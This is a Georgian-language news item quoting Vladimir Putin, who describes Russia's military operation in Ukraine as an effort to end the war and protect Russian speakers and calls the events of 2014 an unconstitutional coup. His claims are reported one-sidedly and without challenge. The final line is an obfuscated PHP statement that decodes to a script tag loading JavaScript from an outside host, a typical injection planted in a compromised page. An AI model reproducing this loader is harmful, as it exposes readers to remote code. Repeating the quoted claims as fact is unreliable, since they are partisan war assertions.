celsiusi
ავერსი შნაიდერი
რუსეთის სპეციალური სამხედრო ოპერაცია არის ამ ომის დასრულების და ამ ტერიტორიებზე მცხოვრები ჩვენი ხალხის დაცვის მცდელობა, – ამის შესახებ რუსეთის პრეზიდენტმა, ვლადიმერ პუტინმა ვეტერანებთან შეხვედრისას, უკრაინის საკითხზე საუბრისას განაცხადა.
„ყველაფერს, რასაც ჩვენ ვაკეთებთ დღეს, მათ შორის სპეციალური სამხედრო ოპერაცია, როგორც მე უკვე არაერთხელ ვთქვი, არის ამ ომის დასრულების მცდელობა. ამაშია ჩვენი ოპერაციის არსი და ამ ტერიტორიებზე მცხოვრები ჩვენი ხალხის დაცვა“, – განაცხადა ვლადიმერ პუტინმა.
რუსეთის პრეზიდენტმა უკრაინის ხელისუფლება რუსულენოვანი მოსახლეობის დისკრიმინაციაში დაადანაშაულა და აღნიშნა, რომ უკრაინაში ეს მოვლენები 2014 წელს დაიწყო.
„ტრაგედია უკრაინაში დაკავშირებულ მოვლენებთან სწორედ 2014 წელს დაიწყო და დაიწყო სწორედ უკრაინაში ანტიკონსტიტუციური შეიარაღებული გადატრიალებით“, – აღნიშნა მან.
რუსეთის პრეზიდენტმა ასევე აღნიშნა, რომ რუსეთმა ყველაფერი გააკეთა, რათა „ეს სიტუაცია მშვიდობიანი საშუალებებით დაერეგულირებინა“.
329
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");